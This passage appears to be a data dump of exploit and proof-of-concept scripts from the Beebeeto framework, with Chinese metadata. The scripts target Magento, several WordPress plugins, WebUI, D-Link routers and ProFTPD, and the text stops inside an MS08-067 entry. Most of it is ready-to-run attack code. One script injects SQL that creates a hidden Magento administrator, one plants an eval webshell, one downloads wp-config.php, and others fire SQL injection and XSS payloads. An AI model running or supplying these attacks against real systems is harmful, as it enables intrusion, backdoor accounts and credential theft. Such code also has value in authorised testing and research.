{"create_date": "2015-05-12 17:20:13", "name": "Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "Magento 1.9.1 \u6f0f\u6d1e,Magento RCE \u6f0f\u6d1e,\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport base64\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.generator import generate_user_pwd\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0099',\r\n 'name': 'Magento 1.9.1 \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2015-05-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Magento',\r\n 'vul_version': ['1.9.1'],\r\n 'type': 'Code Execution',\r\n 'tag': ['Magento 1.9.1 \u6f0f\u6d1e', 'Magento RCE \u6f0f\u6d1e', '\u7535\u5b50\u5546\u52a1\u7cfb\u7edf\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684\r\n web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002\r\n ''',\r\n 'references': [\r\n 'http://devdocs.magento.com/guides/m1x/other/appsec-900_addhandler.html',\r\n 'http://www.siph0n.in/exploits.php?id=3829',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n if url.endswith(\"/\"):\r\n url = url[:-1]\r\n target_url = url + 
\"/index.php/admin/Cms_Wysiwyg/directive/index/\"\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + target_url\r\n # For demo purposes, I use the same attack as is being used in the wild\r\n SQLQUERY=\"\"\"\r\n SET @SALT = 'rp';\r\n SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));\r\n SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;\r\n INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());\r\n INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');\r\n \"\"\"\r\n # Put the nice readable queries into one line,\r\n # and insert the username:password combinination\r\n password = generate_user_pwd.password()\r\n query = SQLQUERY.replace(\"\\n\", \"\").format(username=\"beebeeto\", password=password)\r\n pfilter = \"popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}\".format(query)\r\n r = requests.post(target_url, data={\"___directive\":\r\n \"e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ\",\r\n \"filter\": base64.b64encode(pfilter),\r\n \"forwarded\": 1})\r\n if r.ok:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = target_url\r\n args['poc_ret']['message'] = 'Admin(user/pwd): beebeeto/{})'.format(password)\r\n return args\r\n\r\n verify = exploit\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": 
"Magento\u5e73\u53f0\u4e2d\u7684\u4e00\u7cfb\u5217\u4e25\u91cd\u6f0f\u6d1e\u6700\u7ec8\u5141\u8bb8\u672a\u7ecf\u6388\u6743\u7684\u653b\u51fb\u8005\u6267\u884c\u4ed6\u4eec\u6240\u9009\u62e9\u7684web\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u4ee3\u7801\u3002", "app_name": "Magento", "id": "poc-2015-0099", "layer4_protocol": null}
{"create_date": "2015-05-07 10:18:51", "name": "WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "range", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0096',\r\n 'name': 'WordPress MiwoFTP <=1.0.5 \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'range',\r\n 'create_date': '2015-05-05',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<=1.0.5',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress MiwoFTP\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download\r\n ''',\r\n 'references': ['https://www.exploit-db.com/exploits/36801/', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download'\r\n '&item=wp-config.php&order=name&srt=yes')\r\n verify_url = args['options']['target'] + payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"DB_PASSWORD\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n exploit = verify\r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download", "app_name": "WordPress", "id": "poc-2015-0096", "layer4_protocol": null}
{"create_date": "2015-04-28 16:09:14", "name": "WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "7rac3", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "WebUI\u6f0f\u6d1e,/mainfile.php,Remote Code Execution Vulnerability,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n 'poc':{\r\n 'id': 'poc-2015-0094',\r\n 'name': 'WebUI 1.5b6 /mainfile.php \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e POC & Exploit',\r\n 'author': '7rac3',\r\n 'create_date': '2015-4-27',\r\n },\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n 'vul':{\r\n 'app_name': 'WebUI',\r\n 'vul_version': ['1.5b6'],\r\n 'type': 'Code Execution',\r\n 'tag': ['WebUI\u6f0f\u6d1e', '/mainfile.php', 'Remote Code Execution Vulnerability', 'php'],\r\n 'desc': 'WebUI 1.5b6 has code execution in mainfile.php',\r\n 'references': ['https://www.exploit-db.com/exploits/36821/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls,args):\r\n target = args['options']['target']\r\n payload = '/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);%27'\r\n vul_url = target + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: '+ vul_url\r\n response = requests.get(vul_url)\r\n text = response.content\r\n if '698d51a19d8a121ce581499d7b701668' in text:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = vul_url\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls,args):\r\n target = args['options']['target']\r\n payload = 
'/mainfile.php?username=RCE&password=BB2&_login=1&Logon=%27;echo%20md5(111);@eval($_POST[bb2]);%27'\r\n vul_url = target + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: '+ vul_url\r\n response = requests.get(vul_url)\r\n text = response.content\r\n if '698d51a19d8a121ce581499d7b701668' in text:\r\n args['success'] = True\r\n args['poc_ret']['webshell'] = vul_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = Mypoc()\r\n pprint(mp.run())", "desc": "WebUI 1.5b6 has code execution in mainfile.php", "app_name": "Other", "id": "poc-2015-0094", "layer4_protocol": null}
{"create_date": "2015-04-27 21:32:04", "name": "Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 5, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e,/wp-comments-post.php,Cross Site Scripting,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport random\r\nimport string\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0092',\r\n 'name': 'Wordpress < 4.1.2 /wp-comments-post.php \u5b58\u50a8\u578bXSS\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<4.1.2'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Wordpress\u5b58\u50a8\u578bXSS\u6f0f\u6d1e', '/wp-comments-post.php', 'Cross Site Scripting', 'php'],\r\n 'desc': '''\r\n \u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n \u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n \u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n 
\u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002\r\n ''',\r\n 'references': [\r\n 'https://wordpress.org/news/2015/04/wordpress-4-1-2/',\r\n 'https://cedricvb.be/post/wordpress-stored-xss-vulnerability-4-1-2/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n target = args['options']['target']\r\n verify_url = target + \"/wp-comments-post.php\"\r\n rand_str = lambda length: ''.join(random.sample(string.letters, length))\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n print '[*] Checking...'\r\n try:\r\n post_id = re.search(r'post-(?P<post_id>[\\d]+)',\r\n requests.get(target).content).group('post_id')\r\n except:\r\n if args['options']['verbose']:\r\n print '[-] Not WordPress'\r\n return args\r\n ttys = \"test<blockquote cite='%s onmouseover=alert(1)// \\xD8\\x34\\xDF\\x06'>\"\r\n flag = rand_str(10)\r\n payload = {\r\n 'author': rand_str(10),\r\n 'email': '%s@%s.com' % (rand_str(10), rand_str(3)),\r\n 'url': 'http://www.beebeeto.com',\r\n 'comment': ttys % flag,\r\n 'comment_post_ID': post_id,\r\n 'comment_parent': 0,\r\n }\r\n if args['options']['verbose']:\r\n print '[*] Send Payload: %s' % payload['comment']\r\n content = requests.post(verify_url, data=payload).content\r\n if '<blockquote cite=’%s onmouseover=alert(1)' % flag in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = '%s/?p=%s' % (target, post_id)\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u8be5\u95ee\u9898\u7531 mysql \u7684\u4e00\u4e2a\u7279\u6027\u5f15\u8d77\uff0c\u5728 mysql \u7684 utf8 \u5b57\u7b26\u96c6\u4e2d\uff0c\u4e00\u4e2a\u5b57\u7b26\u75311~3\u4e2a\u5b57\u8282\u7ec4\u6210\uff0c\r\n\u5bf9\u4e8e\u5927\u4e8e3\u4e2a\u5b57\u8282\u7684\u5b57\u7b26\uff0cmysql \u4f7f\u7528\u4e86 
utf8mb4 \u7684\u5f62\u5f0f\u6765\u5b58\u50a8\u3002\r\n\u5982\u679c\u6211\u4eec\u5c06\u4e00\u4e2a utf8mb4 \u5b57\u7b26\u63d2\u5165\u5230 utf8 \u7f16\u7801\u7684\u5217\u4e2d\uff0c\u90a3\u4e48\u5728mysql\u7684\u975estrict mode\u4e0b\uff0c\r\n\u4ed6\u4f1a\u5c06\u540e\u9762\u7684\u5185\u5bb9\u622a\u65ad\uff0c\u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u7f3a\u9677\u5b8c\u6210 XSS \u653b\u51fb\u3002", "app_name": "WordPress", "id": "poc-2015-0092", "layer4_protocol": null}
{"create_date": "2015-04-24 00:15:36", "name": "D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e,/HNAP1\u6f0f\u6d1e,\u8def\u7531\u5668\u6f0f\u6d1ePOC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0090',\r\n 'name': 'D-link DIR-890L /HNAP1 \u672a\u6388\u6743\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-24',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-link',\r\n 'vul_version': ['DIR-890L'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['D-link DIR-890L\u7cfb\u7edf\u6f0f\u6d1e', '/HNAP1\u6f0f\u6d1e', '\u8def\u7531\u5668\u6f0f\u6d1ePOC'],\r\n 'desc': 'D_link /HNAP1 unauthenticated remote query information',\r\n 'references': ['http://www.freebuf.com/vuls/64521.html',\r\n 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/HNAP1/' % args['options']['target']\r\n soap = {'SOAPAction': '\"http://purenetworks.com/HNAP1/GetWanSettings\"'}\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n req = requests.get(verify_url, headers=soap)\r\n if req.status_code == 200 and 'xmlns:soap' in req.content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return 
args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "D-LINK", "id": "poc-2015-0090", "layer4_protocol": null}
{"create_date": "2015-04-22 13:55:00", "name": "WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Sh4dow", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165\u6f0f\u6d1e", "tag": "WordPress SQL\u6ce8\u5165\u6f0f\u6d1e,NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0089',\r\n 'name': 'WordPress NEX-Forms 3.0 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'Sh4dow',\r\n 'create_date': '2015-04-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['3.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress SQL\u6ce8\u5165\u6f0f\u6d1e', 'NEX-Forms\u63d2\u4ef6\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n There are sql injection vulnerabilities in NEX-Forms Plugin\r\n which could allow the attacker to execute sql queries into database\r\n ''',\r\n 'references': ['https://www.exploit-db.com/exploits/36800/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payloads = {'/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 AND (SELECT * FROM (SELECT(SLEEP(10)))NdbE)',\r\n '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=1 and sleep(5)',\r\n '/wp-admin/admin-ajax.php?action=submit_nex_form&nex_forms_Id=10 and sleep(5)'\r\n }\r\n for payload in payloads:\r\n verify_url += payload\r\n start_time = time.time()\r\n if 
args['options']['verbose']:\r\n print '[*]Request URL ' + verify_url\r\n req = requests.get(verify_url).content\r\n if time.time() - start_time > 5:\r\n args['options']['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n break\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "There are sql injection vulnerabilities in NEX-Forms Plugin\r\nwhich could allow the attacker to execute sql queries into database", "app_name": "WordPress", "id": "poc-2015-0089", "layer4_protocol": null}
{"create_date": "2015-04-20 22:27:48", "name": "ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Evi1m0", "rank": 4, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "ProFTPD\u6f0f\u6d1e,mod_copy\u6f0f\u6d1e,CVE-2015-3306", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport random\r\nimport telnetlib\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0088',\r\n 'name': 'ProFTPD <=1.3.5 mod_copy \u672a\u6388\u6743\u6587\u4ef6\u590d\u5236\u6f0f\u6d1e(CVE-2015-3306) POC',\r\n 'author': 'evi1m0',\r\n 'create_date': '2015-04-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'ftp',\r\n 'port': [21],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'ProFTPD',\r\n 'vul_version': ['<=1.3.5'],\r\n 'type': 'Other',\r\n 'tag': ['ProFTPD\u6f0f\u6d1e', 'mod_copy\u6f0f\u6d1e', 'CVE-2015-3306'],\r\n 'desc': '''\r\n This candidate has been reserved by an organization or individual that will use it when announcing\r\n a new security problem. 
When the candidate has been publicized, the details for this candidate will be\r\n provided.\r\n ''',\r\n 'references': ['http://bugs.proftpd.org/show_bug.cgi?id=4169',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n ip = http.transform_target_ip(http.normalize_url(args['options']['target']))\r\n if args['options']['verbose']:\r\n print '[*] {} Connecting...'.format(ip)\r\n tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n tn.write('site help\\r\\n')\r\n tn.write('quit\\n')\r\n status = tn.read_all()\r\n if 'CPTO' in status and 'CPFR' in status:\r\n if args['options']['verbose']:\r\n print '[*] Find CPTO & CPFR'\r\n tn = telnetlib.Telnet(ip, port=21, timeout=15)\r\n filename_tmp = '/tmp/evi1m0_%s.sh'%random.randint(1, 1000)\r\n tn.write('site cpto evi1m0@beebeeto\\n')\r\n tn.write('site cpfr /proc/self/fd/3\\n')\r\n tn.write('site cpto %s\\n'%filename_tmp)\r\n tn.write('quit\\n')\r\n result = tn.read_all()\r\n if 'Copy successful' in result:\r\n args['success'] = True\r\n args['poc_ret']['vul_target'] = ip\r\n args['poc_ret']['filename'] = filename_tmp\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "This candidate has been reserved by an organization or individual that will use it when announcing\r\na new security problem. When the candidate has been publicized, the details for this candidate will be\r\nprovided.", "app_name": "ProFTPD", "id": "poc-2015-0088", "layer4_protocol": null}
{"create_date": "2015-04-20 18:07:05", "name": "Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "1024", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "WordPress\u63d2\u4ef6\u6f0f\u6d1e,/wp-admin/admin-ajax.php,SQL Injection,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0087',\r\n 'name': 'Wordpress Ajax Store Locator <= 1.2 SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': '1024',\r\n 'create_date': '2015-04-20',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['<=1.2'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['WordPress\u63d2\u4ef6\u6f0f\u6d1e', '/wp-admin/admin-ajax.php', 'SQL Injection', 'php'],\r\n 'desc': 'The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability',\r\n 'references': ['https://www.exploit-db.com/exploits/36777/'],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n payload = ('wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore'\r\n '&Location=Social&StoreLocation=1~1+UNION+SELECT+1,2,3,4,md5(233),6,7,8,9,10'\r\n ',11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--')\r\n verify_url = url + payload\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.get(url).content\r\n if 'e165421110ba03099a1c0393373c5b43' in 
content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "The \"sl_dal_searchlocation_cbf\" ajax function is affected from SQL Injection vulnerability", "app_name": "WordPress", "id": "poc-2015-0087", "layer4_protocol": null}
{"create_date": "2015-04-19 20:11:06", "name": "MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "tmp", "rank": 3, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Windows\u6f0f\u6d1e,NetAPI32.dll\u6f0f\u6d1e,CVE-2008-4250,ms08-067", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http import http\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0085',\r\n 'name': 'MS08-067 NetAPI32.dll \u8fdc\u7a0b\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(CVE-2008-4250) POC',\r\n 'author': 'tmp',\r\n 'create_date': '2015-04-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'SMB',\r\n 'port': [445],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Windows',\r\n 'vul_version': ['*'],\r\n 'type': 'Buffer Overflow',\r\n 'tag': ['Windows\u6f0f\u6d1e', 'NetAPI32.dll\u6f0f\u6d1e', 'CVE-2008-4250', 'ms08-067'],\r\n 'desc': '''\r\n MS08-067\u6f0f\u6d1e\u7684\u5168\u79f0\u4e3a\u201cWindows 